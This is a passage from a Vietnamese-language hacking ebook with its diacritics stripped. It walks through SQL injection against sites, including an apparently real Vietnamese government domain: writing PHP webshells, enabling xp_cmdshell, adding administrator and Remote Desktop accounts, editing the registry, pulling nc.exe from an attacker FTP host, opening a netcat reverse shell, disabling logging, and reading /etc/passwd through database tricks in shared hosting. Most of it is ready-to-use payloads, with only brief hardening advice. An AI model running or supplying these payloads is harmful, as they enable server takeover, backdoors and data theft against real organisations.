Trong mt s trng hp ta cn s dng hex va unhex:
0 AND 1=0 UNION SELECT hex(load_file()) INTO OUTFILE
Hoc ban co th ghi bt c th gi vao file, nh la webshell chng han:
0 AND 1=0 UNION SELECT '<? include("$hieupc"); ?>',null INTO OUTFILE ../../web/server/dir/hieupc.php

Page 23
y la 1 s vi d:
// PHP SHELL
<? system($_GET['c']); ?>
'<? php system ($ _GET [cmd]);>'
hoc passthru nu mun:
// webserver info
<? phpinfo(); ?>
// SQL QUERY
<? $result =mysql_query($_GET['query']); ?>
Cui cung, 1 s chu y v kiu khai thac nay:
-Khng th overwrite file vi cu lnh nay.
-INTO OUTFILE phai la mnh cui cung trong cu truy vn. Ngoi ra, c th ma hoa code
ban mun ghi vao file bng cch convert sang Ascii.
Vic up shell la phn quan trong nht i vi li MYSQL.Va mt iu quan trong khng km l
chng ta cn a thm bin hay tham s, c th la s. N se giup ta thc hin c 1 s lnh bi
gii han trong Mysql.
V d: union select 1.2, user, pass, from 5,6 +++users limit +5.3 / * [/ i]
Chng se th lai 3 ln vi ct s 5

i khi chng ta gp phai 1 s c ch lc hay ma hoa trong Mysql. Chnh v vy giai quyt
vn loai bo c ch trn ta cn 1 cu lnh khng km phn quan trong:
http://www.site.ru/index.php?page=-1 +union ++1.2 select, AES_DECRYPT (AES_ENCRYPT (USER (), 0x71),
0x71), 4,5,6 / *
i khi ta bi gii han vic s dng cac khoan khng gian s dng. xac lp lai ta dng cc
lnh sau:
http://www.site.ru/index.php?page=-1 +union ++1.2 select, user, password, 5,6 mysql.user +from +/ *
http://www.site.ru/index.php?page=-1/ ** / union / ** / select / ** / 1.2, user,
Phn cui la DOS: Chc cu lnh ny moi ngi ai cung hiu:
http://www.site.ru/index.php?page=-1 +BENCHMARK (10000000, BENCHMARK (10000000 md5
(current_date)))

Page 24
2. Ky thut chim quyn Admin qua SA MSSQL Server:
Sau y la mt vi d thc t v chim quyn Admin qua SA ma hieupc thc hin trn 1 server
VN ma co ui la: GOV.VN (hieupc xin gi kin site nay vi tranh site bi pha hoai). Thng
thng li nh sau la ban co th chim quyn Admin mt cach d dang nu Server xai quyn SA
hoc la mt user co ngang quyn SA chng han. check xem co li hay khng thi thm du .
Vi d:

Check thng tin h thng cai nao. Ta s dng cu lnh gp thng tin nh sau. Vi d:
http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(124)%2bdb_na
me()%2bchar(124)%2bsystem_user%2bchar(124)%2b@@version)--sp_password
Kt qua:

Kim tra xem System_User hin tai c quyn ngang = SA khng:

i luc co nhng System_user c quyn ngang =SA nhng luc query chung ta khng thy n c
tn l 'SA' nn thng bo qua ...

Co 1 cach ban kim tra xem System_user o co nm trong role sysadmin khng (ngang =
SA)

V d victim l:
www.hieupc.gov.vn/hieupc.asp?id=1
Page 25
Kim tra System_User
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,system_user)--sp_password
Kt qua:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'hieupc' to a
column of data type int.
Nh vy l System_user m Server nay ang dung co tn la hieupc , by gi ta th kim tra
xem hieupc c quyn ngang =SA khng
www.hieupc.gov.vn/hieupc.asp?id=1;drop table check_sysuser create table check_sysuser (id int identity,noi_dung
varchar(1000)) insert into check_sysuser select sysadmin from master..syslogins where name ='hieupc'--
sp_password
===>tao ra 1 table tn check_sysuser v chn gi tri out put cua cu query select sysadmin
from master..syslogins where name ='hieupc' vao trng noi_dung cua table...
http://www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung%2b'/' from check_sysuser
where id=1))--sp_password
===>Select gi tri cua trng noi_dung , ban ch %2b ngha la du +.
Kt qua:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1/ ' to a column of
data type int.
===>Ngha la tai khoan SQL hieupc c quyn ngang =SA. Trong bi ny Server m Hieupc
ang hack thi user =quyn SA.

Trng hp m bo li th nay:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '0/ ' to a column of
data type int.
===>Ngha la tai khoan SQL hieupc khng c quyn hnh =SA , ta chi c th khai thac ly
thng tin nh binh thng thi c.
Gi ta phai lam gi nu co quyn SA trong tay?
Enable xp_cmdshell trn SQL Server 2005

- Nh c bit th MSSQL Server 2005 mc inh l Disable lnh xp_cmdshell ngha la ngay
ca khi c ti khoan SQL l "SA" ta cung khng th chay c cc cu lnh CMD:

Page 26

+V d victim l:
(Site ny c quyn system_user =SA lun nh) , khi ta th chay cu lnh CMD sau:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password

Kt qua tra v la khng co li gi.
Nhng m v c "SA" trong tay nn ci ny ta vn c th enable c bng cch dng
sp_configure
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'show advanced options', 1--sp_password
===>cu lnh ny l ta bt show advanced options th mi c th enable xp_cmdshell c.
(v xp_cmdshell nm trong o) ... Nu n khng bo li g m tr lai trang:
Thi kt qua la thanh cng. Tip tc khai thac:
http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password
===>cu lnh nay ta reconfigure lai n bt u bt show advanced options ... Nu n
khng bo li g m tr lai trang:
Thi kt qua la thanh cng. Tip tc khai thac:
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_configure 'xp_cmdshell', 1--sp_password
===>bt u enable xp_cmdshell ... Nu n khng bo li g m tr lai trang:
Thi kt qua la thanh cng. Tip tc khai thac vi cu lnh reconfigure mt ln na:
http://www.hieupc.gov.vn/hieupc.asp?id=1;reconfigure--sp_password
===>cu lnh nay ta reconfigure lai n bt u bt xp_cmdshell

Sau khi a enable xp_cmdshell ta th ipconfig /all xem sao:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ipconfig /all'--sp_password

Page 27

Kt qua tra v:

Lu y: mc du enable xp_cmdshell nhng cha chc lm c g trn server, tai v
MSSQL Server 2005 khng cho chay cc lnh nh "net user hieupc 123456 /add" , ngay ca
active user Guest "net user Guest /active" con khng hiu qua

Add thm user vo MSSQL Server:

By gi vn Victim l

Add thm user vo SQL Server lm g ? La ta c th login vo MSSQL Server cua ho bng
Query Analyzer trong Microsoft SQL Server c th vit Query va nhanh v d dang hn
(hoc nm vng cung cc tt). Ngoai ra ta co th s dng: RazorSQL connect.

u tin l tao ra user:
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addlogin 'hieupc', '123456'--sp_password
===>Ta va tao thm 1 user trong SQL Server cua n vi username l hieupc v password l
123456. Nu n khng bo li g m tr lai trang:
Thi kt qua la thanh cng. Khi c user ri th ta phai add n ln quyn quan tri cao nht
(ngang =SA)
www.hieupc.gov.vn/hieupc.asp?id=1;exec sp_addsrvrolemember 'hieupc', 'sysadmin'--sp_password
Nu n khng bo li g m tr lai trang:
Thi kt qua la thnh cng.

Page 28

By gi ta dung Query Analyzer hoc RazorSql connect va login vao th xem sao (nhng chi p
dng cho server MSSQL cho remote t xa nh. Vi mt s server cm remote MSSQL t xa.)
Kt qua:

V ti y ri, cac ban lam c rt nhiu iu hay lm y.
Chim quyn Admin va Remote Desktop nh sau:
S dng cu lnh CMD sau add thm user cho window vi username =hieupc v password =
123456:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net user hieupc 123456 /add'--sp_password
Kt qua nh sau la thanh cng:

add user hieupc vo group administrators, ta lam nh sau:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup administrators hieupc /add'--
sp_password

Page 29
By gi ta add user hieupc vo group Remote Desktop Users n c quyn Remote Desktop:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" hieupc
/add'--sp_password

Vy l by gi ban c thm 1 ti khoan admin vi password l 123456 vi quyn h thng v
c th remote desktop.
Chon remote desktop nh sau :
(Start->programs->accessories->communications->Remote Desktop)
Hoc vo run g "mstsc"

Gi chi cn in IP hoc domainname (www.hieupc.gov.vn) anh user va pass vao login vo
server v lm nhng g mnh mun.
Kt qua la a remote desktop c vao server:

Upload Backdoor ln Server nh th nao qua quyn SA:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.Your_Domain.com>ftp&echo user
Your_User Your_Pass>>ftp&echo get Your_File>>ftp&echo quit>>ftp'--sp_password

Page 30

===>tao file batch cha nhng lnh cua FTP
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password
===>thc thi lnh cua file batch

ftp.Your_Domain.com : ch ny l domain cua ban , v d ftp.hieupc.com

Your_User : y la username ng nhp vo ftp

Your_Pass : password ng nhp vo ftp

Your_File : file m ban mun up ln server (file phai nm trn host ftp cua ban) , v d nc.exe

V d ban c 1 host ftp l ftp.hieupc.com vi username l hieupc v pass l 123456 , ban mun
upload file nc.exe t trn host ftp o ln server th ban lm:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.hieupc.com>ftp&echo user hieupc
hieupcpass>>ftp&echo get nc.exe>>ftp&echo quit>>ftp'--sp_password

Sau khi chay xong ban c th kim tra xem file c up ln server hay cha bng cach sau:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))
insert into hieupc exec master..xp_cmdshell 'dir Your_File'--sp_password
===>tao 1 table lu gi ni dung cua cu lnh exec master..xp_cmdshell 'dir Your_File' ban nh
l Your_File =tn file m ban va up ln , v d nc.exe...
Xem ni dung cai nao:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=6))--sp_password
Kt qua:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '06/23/2007 04:56
PM 579 nc.exe' to a column of data type int
===>a upload thanh cng.

Lam th nao khi ta khng th Remote Desktop vao Server:
i khi a co c user va pass ri nhng khi remote desktop thi lai khng c vi bi Firewall
chn lai hoc do Server a tt chc nng nay i.
Page 31


Sau y la cach giai quyt:
Site demo vn la:

Nh cac ban bit l Registry hay con goi la Regedit rt quan trong trong h thng cua
window , khi c system_user ='SA' trong tay th ban c th tng tac vao registry cua my chu.
Vi vy ta phai can thip vao Regedit Enable mt vai th:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal
Server','fDenyTSConnections',REG_DWORD,0--sp_password
===>ghi kha registry cho fDenyTSConnections vi gi tri =0

Tip tc cu lnh:
Server','AllowTSConnections',REG_DWORD,1--sp_password
===>ghi kha registry cho AllowTSConnections vi gi tri =1
Sau o:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,@@servername)--sp_password
===>ly tn server cn khi ng lai.
Va s dng cu lnh sau restart lai may 'shutdown -m \\tn_server r t 5'
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'shutdown -m \\tn_server r t 5'--sp_password
===>restart my no.

Page 32

Mt s iu cn chu y:
Delete 1 kha registry nh sau:
www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'rootkey', 'key'--sp_password
===>cc ban ch 'rootkey' v 'key' l ng dn n khoa registry o ...

V d hieupc mun xa kha registry TestValue
'HKEY_LOCAL_MACHINE\SOFTWARE\Test' th se l:
www.hieupc.gov.vn/hieupc.asp?id=1;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE',
'SOFTWARE\Test\TestValue'--sp_password

oc gi tri 1 kha registry nh sau:

V d ban mun oc kha registry fDenyTSConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server xem n c
gi tri =bao nhiu th ban u tin phai query:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),
noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections'--
sp_password
===>tao ra 1 table lu tr gi tri registry cua khoa o

Sau o ban phai select d liu trong o ra xem:
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc
===>%2b =du +

Nu n hin li:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value
'fDenyTSConnections/0' to a column of data type int.
===>c ngha la khoa fDenyTSConnections c gi tri =0

Ghi thm v Sa gi tri cua kha registry nh sau:

V d Hieupc se sa gi tri cua fDenyTSConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Terminal Server thnh 1
Server','fDenyTSConnections',REG_DWORD,1--sp_password Page 33
Mt vai iu cn lu v Remote Desktop:

Khi m c SA v ban add thm thnh cng ti khoan Admin , nhng khi ban connect vo
Remote Desktop cua Server th lai khng c. Vy phai lm g tip theo y?
Luc nay ta phai enable cai Terminal Service bng cach:
Sc config TermService start= auto
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'Sc config TermService start= auto'--
sp_password
Enable xong thi ta phai start TermService:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'net start TermService'--sp_password

M Port trong Firewall cho Remote Desktop:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall add portopening TCP
3389 Remote Desktop'--sp_password
By gi ta th connect Remote Desktop vao Server th xem sao.
Ngoi ra ban cn lam thm vai cu lnh sau nu vn khng connect c vao Remote Desktop:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remoteadmin
enable'--sp_password

www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell netsh firewall set service remotedesktop
enable'--sp_password
Ch thm:
Thng thng l 1 Server khng c bt Firewall (nu co thng l firewall phn cng), nhng
nu trong trng hp Server bt firewall, v chn 1 ng dng connect cua ban (nh Remote
Desktop chng han) th sao? (v d nh chn netcat) th ban hy tham khao cch sau:
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'netsh firewall set opmode enable disable'--
sp_password

Page 34
Server co enable nhng IP MSSQL Server khng trng vi ip Server cha web, ta lam nh
sau:
Ban cn tm ra IP chnh xc cua MSSQL Server
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung varchar(1000))
insert into hieupc exec master..xp_cmdshell 'ipconfig'--sp_password
===>tao ra 1 bang lu tr thng tin cua lnh ipconfig
Sau o
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select noi_dung from hieupc where id=8))--sp_password
Kt qua:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'IP Address. . . . . . . .
. . . . : xxx.xxx.x.xxx' to a column of data type int.
==> xxx.xxx.x.xxx chnh l ip cua MSSQL Server.
Vy l ban c IP cua MSSQL , nhng nu n l IP mang LAN th sao ?. Th ban phai dng
n netcat , ban phai up netcat ln server v kt ni t server v my cua ban , u tin ban phai
upload file netcat ln 1 host ftp cua minh: (cai nay a c hng dn bai trn, xem chi tit
trn nh)
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo open ftp.your-host.com>>ftp'--sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo user your-ftp-username your-ftp-pass>>ftp'--
sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo get nc.exe>>ftp'--sp_password
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'echo quit>>ftp'--sp_password
By gi ban copy file netcat (nc.exe) vo C:\ cua minh , vo cmd v g lnh cd\ di chuyn
ti C:\
sau o g nc -l -p 1787 -vv
www.hieupc.gov.vn/hieupc.asp?id=1;exec master..xp_cmdshell 'nc.exe -e cmd.exe -d your-ip 1787'--sp_password
hoc
www.hieupc.gov.vn/hieupc.asp?id=1;select%20*%20from%20openrowset('sqloledb','server=BACKUP;uid=BUILT
IN\Administrators;pwd=','set%20fmtonly%20off%20select%201%20exec%20master..xp_cmdshell%20"nc.exe -e
cmd.exe -d 58.187.32.40 1787"')--sp_password
58.187.32.40 hoc your ip : la ia chi IP cua ban, xem ia chi IP cua ban bng cach vao: ip2location.com

Lu y: Nu connect thanh cng vao NC thi ban hu nh remote c vao Server va co th lam
nhng gi ban thich.

Page 35
Nu Server change port Remote Desktop th sao:
www.hieupc.gov.vn/hieupc.asp?id=1;drop table hieupc create table hieupc (id int identity,noi_dung1 varchar(99),
noi_dung2 varchar(99)) insert into hieupc EXEC master..xp_regread
'HKEY_LOCAL_MACHINE','System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-
Tcp\','PortNumber'--sp_password
Query ly kt qua nao
www.hieupc.gov.vn/hieupc.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from hieupc
Kt qua tra lai:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'PortNumber/xxxx'
to a column of data type int.
===>nu xxxx khc 3389 th xxxx chnh l cng Remote Desktop mi m Server change (v
3389 l cng mc inh cua Remote Desktop)
Vy khi ban connect ti server ban phai thm xxx vo sau IP cua server.
Nu gp user khng phai la SA thi sao:
Tai sao lai phai a Guest vao DataBase Owner cua DataBase Master?
B v DB Owner cua Db Master mi c quyn thc hin lnh xp_regwrite,xp_regdeletevalue
v xp_cmdshell.
Tai sao Guest lai s dng 2 lnh xp_regwrite,xp_regdeletevalue vxp_cmdshell
Bi v :
xp_regwrite dung thc hin lnh ghi ln Registry cua Windows
xp_regdeletevalue dung xa d liu trong Registry cua Windows
xp_cmdshell dung gi lnh ln Windows dung nng quyn , chim quyn , ci backdoor
..... s
Cn y la lnh a Guest vao Db Owner cua Db Master:
http://www.victim.com/index.asp?id=1;exec sp_executesql N'create view dbo.test as select * from
master.dbo.sysusers'exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec
sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''Guest''','xx' exec sp_executesql N'drop
view dbo.test'--sp_password

Nu chay link trn m khng bo li va c tra v trang :
http://www.victim.com/index.asp?id=1

tc l ban thc hin thnh cng vic a Guest vao Db Owner cua Db Master nhng cho
chc n mnh vn kim tra lai mt ln na bng cch sau :
http://www.victim.com/index.asp?id=1%20%20and%201=convert(int,(select%20top%201%20name%20from%20m
aster..sysusers%20where%20roles=0x01%20and%20name%20not%20in('dbo')))--sp_password

Vy l xong gi th thoai mi chay xp_regwrite vi ca xp_cmdshell
Page 36
C th chay xp_regwrite ,xp_regdeletevalue vi xp_cmdshell ri th lm g?
Gi login vo Database vi user BUILTIN\ADMINISTRATOR vi password ="xx":
http://www.victim.com/index.asp?id=1;exec%20sp_executesql%20N'create%20view%20dbo.test%20as%20select%
20*%20from%20master.dbo.sysxlogins'%20exec%20sp_msdropretry%20'xx%20update%20sysusers%20set%20sid
=0x01%20where%20name=''dbo''','xx'%20exec%20sp_msdropretry%20'xx%20update%20dbo.test%20set%20xstat
us=18%20where%20name=''BUILTIN\ADMINISTRATORS''','xx'%20exec%20sp_executesql%20N'drop%20view
%20dbo.test'--sp_password
Vy l ta c mt user nm vung trong DB cua Server ... Sau ny moi mnh lnh phai thng
qua user ny
Gi mnh dng xp_regwrite Enable cai OpenRowset bi SysAdmin kia Disable.
http://www.victim.com/index.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer
\Providers\SQLOLEDB','AllowInProcess',REG_DWORD,1--sp_password

http://www.victim.com/index.asp?id=1;exec master..xp_regwrite
HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\MSSQLServer
\Providers\SQLOLEDB','DisallowAdhocAccess',REG_DWORD,0--sp_password

my ch in m nh:
1 : Enable
0 : Disable
Chay xong m n tra v trang chu l thnh cng khoi check
Gi th xi xp_regdeletevalue huy chc nng ghi log va loc d liu cua WINDOWS
http://www.victim.com/index.asp?id=1;exec master..xp_regdeletevalue
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters','EnableSecurityFilters'--
sp_password

Gi th cc ban khoi lo bi ghi log, chnh v th mnh bo ci sp_password i cung c, nhng
ban lai cung chng sao.
Gi n lc bt ci xp_cmdshell ln. Cc ban lu nha trn l cho php chay xp_cmdshell
cn y la bt xp_cmdshell v allow updates.
http://www.victim.com/index.asp?id=1;select * from openrowset('sqloledb',
'server=BACKUP;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc
xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--sp_password
n y thi ta a c na ng ri, khai thac tip bng cach trn a c trinh bay.

Page 37
3. Nhng iu cn bit v Localhack:
Hieupc c bit hin nay hack local chc ai cung a bit va cach lam thi kha la n gian, ngay
ca nhng thu thut chi khai thac nh th nao cung rt nhiu. Hm nay Hieupc chi a vao ebook
nay vi bai vit di y cung la chi tham khao va chia se kinh nghim cua Hieupc trong
hack local vi vy khi ban oc co th gop y kin ring cua minh nu co gi cha ung hoc con
thiu. Cam n nhiu.
Local hack v cch phng trnh (Tc gia:Pham c Hai):
Bi ny vit vi mc ich cac quan tri va cac ban lam bao mt hiu mt cach r hn v cch
tn local hack. Cch ny tuy rng ph bin a lu nhng ti ngh rng khng chi Vit Nam ma
rt nhiu server nc ngoai vn bi li nay, ma i khi co bug mi la co th dung lai c. Ti
cung tin rng rt nhiu ban bit tn cng local nhng khng bit fix li nay nh th nao ?
Local hack l g:
Hiu mt cach nm na la tn cng cc b. Cc b y co ngha la trn cung mt may chu
(server). Tn cng nay c thc hin nh th nao ?
V d ta cn tn cng site mc www.site1.com, nhng sau khi phn tich tnh hnh th thy rng
vic tn cng trc tip site nay la rt kho. Va cung qua khao sat ta bit c rng trn server nay
c rt nhiu site khac. tng : tn cng mt site khac cung server sau o ly site nay lam ban
ap tn cng site mc tiu.
C nhng loai hack local no ? Ti tam thi chia lam 3 loai : Unix local, windows local, FTP
local. C le rt nhiu ban chi bit n local hack trn Unix ma cha bit n 2 loai sau . Unix
Local c ngha la may chu la Unix, tng t i vi windows local, cn FTP local c ngha la
local qua FTP.
Phn chung nht cua cac loai trn la bc 1, bc tim cac site cung server. Cai nay co thut
ng chung la : Reverse IP. Ta co th dung tool sau xac inh cac site cung server :
http://www.domaintools.com/reverse-ip/ -->ci ny mi thu phi ri
http://www.ip-adress.com/reverse_ip/ cai nay Free va xai cung good lm.
http://www.seologs.com/ip-domains.html ->ci ny c li th la lu ca tn min Vit Nam,
nhng s lng it hn site trn
Sau khi lam xong bc trn, n bc tim site bi li dung lam ban ap tn cng. Bc nay thi
cac loai a co s phn hoa. Ti se trinh bay ring tng phn.
Unix local:
C le by gi chi ph bin site php-mysql trn Unix, nn ti tp chung vao cai nay. Cach tim bug
c tin hanh theo t duy nh sau :
- Nu site o s sng mt loai ma ngun a c xac inh, vi d dung ma ngun m, thi u tin
la vao cac site thng bao bug kim tra xem ban code ang dung co dinh bug nao khng. Co
th vao http://milw0rm.com/ hay http://www.securityfocus.com/ ... tim bug. Page 38
- Nu bc trn khng thanh cng hoc code do ho t phat trin thi cach duy nht la phai t
ngi mo xem. Luc nay da vao kinh nghim va kha nng cua ngi hack l chnh. Cc li hay
c s dng va kha d phat hin : SQL injection, PHP file include, li cai mc inh cac ng
dng nh cac b editor, li khng chng thc phn upload file, upload file khng filter, hoc co
filter +apache unknow extension,... rt nhiu li co th khai thac c. Ti se khng i vao chi
tit cac li nay s dng va khai thac nh th nao.
Sau khi tm ra li, mc tiu la phai upload c mt con shell ln co th tin hanh tip bc
sau. Vic upload c shell hay khng ph thuc rt nhiu vao vic admin site o CHMOD co
tt khng. Ti gia s la a upload c shell ri. n y ta bt u th local sang site mc tiu.
Nu Safe mode OFF va local d dang thi khng co gi ang noi, site mc tiu a co th xm nhp.
Nu Safe mode ON va local gp kho khn, luc nay cn phai bit v cac bug safe mode by pass.
Cc li nay tuy thuc vao phin ban cua PHP va ph thuc vao cac ham co th s dng co bi
cm hay khng. Nu khng dung PHP safe mode by pass ta c th dung LOAD DATA LOCAL
INFINE, v cai nay thi chi Yn a co bai vit ri.
Nu tt ca cac cach trn khng c, ta xoay sang xem co kha nng get root - chim quyn kim
sot server hay khng, ci ny ty thuc vao kernel cua h iu hanh va tuy thuc vao phn mn
ci trn my chu co dinh bug overflow hay khng ? ... Noi tom lai la khi co shell ri mi ngi
c mt cach tuy thuc kha nng.
-->Cch fix ?
khng bi dinh cac li trn thi phai update phn mm va config ung (ti se noi chi tit bai
khc).
- Bt safe mode ON
- Upgrade PHP ln version mi nht
- Trong php.ini Cm cac ham nhay cam + cac ham co th safe mode by pass (i hoi admin phai
cp nht thng tin lin lc)
- i vi virtual host thi tham s open_basedir la rt quan trong, cn phai t tham s nay ung
vi th mc web cua tng site
- CHMOD ky cn thn (CHMOD nh th nao thi phai oc)
- Cc form upload cn phai loc file...
- Trong file my.conf thm dng set-variable=local-infile=0 tranh li LOAD DATA LOCAL
INFINE
Windows local:
Cch tm site li v c ban la ging phn trn, chi khac c tinh ngn ng lp trinh, cn phai
xem xt ky hn khia canh nay.
co th local c co cc kha nng sau : phn quyn bi khng tt (thng la dung chung
group, group phn quyn khng cn thn),server cha cm command execute. Tt ca cac shell
chay trn windows u co mt c tinh la s dng FSO (File System Object) - nu cai nay lam
cn thn ma move cmd.exe i thi khng co cach gi chay c cmd. Page 39
y la con cha noi n chng trinh dit virus rt nhay cam vi FSO, nn rt d bi phat hin.
-->Cch khc phuc ?
Phn quyn tt : tt nht la nn dung windows 2003 server, mi mt site chay mt pool la tt
nht, nhng nh th tn tai nguyn hn. Account chay web cua mi site la ring bit va account
chay ASP.NET khc account chay asp, php,... Vic set permission la cu k quan trong, lam
tt vic nay, cn phai oc thm tai liu va lam tt cac security check list cua Microsoft. Lu l
khng dung Default pool chay. Thng la cac server ring rt hay gp li nay vi admin
nhng server nay chi cn cai cho chay c la xong nhng ngc lai server ring thng chi
chay 1 vai site. Cai nguy him chinh la ch nay, nu ma server ring bi tn cng kha nng mt
quyn kim soat va mt mat d liu nhiu la rt cao.
FTP local:
Ci ny nghe c ve la nhng cach khai thac lai cc k n gian, ti ly chinh site cua ti lam
VD.

Trn hnh ban a nhin thy ri o, cai FTP trn la ti login vo acc FTP cua ti, nhng ti co th
vo tt ca cac FTP khac cung server.
Vy li u ? Li co th do 2 kha nng :
- Tham s Fix Home dir (khng nh r) khng c set
- Tt ca cac user FTP chung group va group nay co quyn i vi tt ca cac th mc cua cac acc
thnh phn.
--> Cch fix ? nh ti trnh by nh trn th ban a bit fix ri ch .
Bi ny ti vit mang tinh cht tng hp, 2 phn trn ti khng ly hinh minh hoa vi no kha ph
bin va co nhiu bai minh hoa ri.

Page 40
Kinh nghim cua Hieupc v LocalHack:
- Hin nay khi hack local a s cac server u bt tinh nng safe mode ON vDisable
functions: phpinfo, lynx, proc_open, symlink, readlink, wget, system, exec, shell_exec, passthru, pcntl_exec, proc_close,
proc_get_status, prus, proc_nice, proc_terminate, popen, pclose, virtual, openlog, escapeshellcmd,escapeshellarg,
show_source, dl, chgrp, chown vi vy ta khng th lam c gi. Vi d v 1 server nh vy hinh
di:
y la trng hp Safe Mode OFF:
- PHP version 5.2.10 nh trong hinh hin nay vn rt kho hack local, nhng i vi nhng phin
ban thp hn thi ta vn co th local bng: Symlink, dng readfile("th mc
web/user/home/public_html/link file"); . Ngoai ra ta cung co th dung cat file qua Mysql hoc
MSSQL nu ban co 1 user Mysql hoc MSSQL trong tay, tt nhin la cung Server nhe.
Vi d: readfile("/etc/passwd"); trong shell R57
Page 41
Cat file qua mysql:
$port ="3306";
$user ="root";
$pass ="";
$database ="test";
$file ="/etc/passwd";
$db =@mysql_connect('localhost:'.$port,$user,$pass);
$sql ="DROP TABLE IF EXISTS temp_vniss_test;";
@mysql_query($sql);
$sql ="CREATE TABLE `temp_vniss_test` ( `file` LONGBLOB NOT NULL );";
@mysql_query($sql);
$sql ="LOAD DATA INFILE \"".$file."\" INTO TABLE temp_vniss_test;";
@mysql_query($sql);
$sql ="SELECT * FROM temp_vniss_test;";
$r =@mysql_query($sql);
while(($r_sql =@mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
$sql ="DROP TABLE IF EXISTS temp_vniss_test;";
@mysql_query($sql);
@mysql_close($db);

Tng t vi mssql:
$port ="1433";
$user ="root";
$pass ="";
$database ="test";
$file ="/etc/passwd";

$db =@mssql_connect('localhost,'.$port,$user,$pass);
@mssql_query("drop table temp_vniss_test",$db);
@mssql_query("create table temp_vniss_test ( string VARCHAR (500) NULL)",$db);
@mssql_query("insert into temp_vniss_test EXEC master.dbo.xp_cmdshell '".$file."'",$db);
$res =mssql_query("select * from temp_vniss_test",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table temp_vniss_test",$db);
@mssql_close($db);

- Co mt cach ban co th xai shell script trn server nu PHP version la: 5.2.10 hoc mi hn,
nu ban co mt host trn server o va co user +pass FTP th lc ny moi chuyn nh n gian
hn vi ban chi cn upload con shell ln va bt u khai thac bng cach Symlink. Symlink bng
cch sau:
Vi d th mc cha web co dang la:
/home/hieu/domains/hieu.net/public_html/
Th mc cha web cua site minh cn symlink la:
/home/hieupc/domains/hieupc.com/public_html/
Page 42
Gi th khai thac ly file config.php v host cua minh nh:
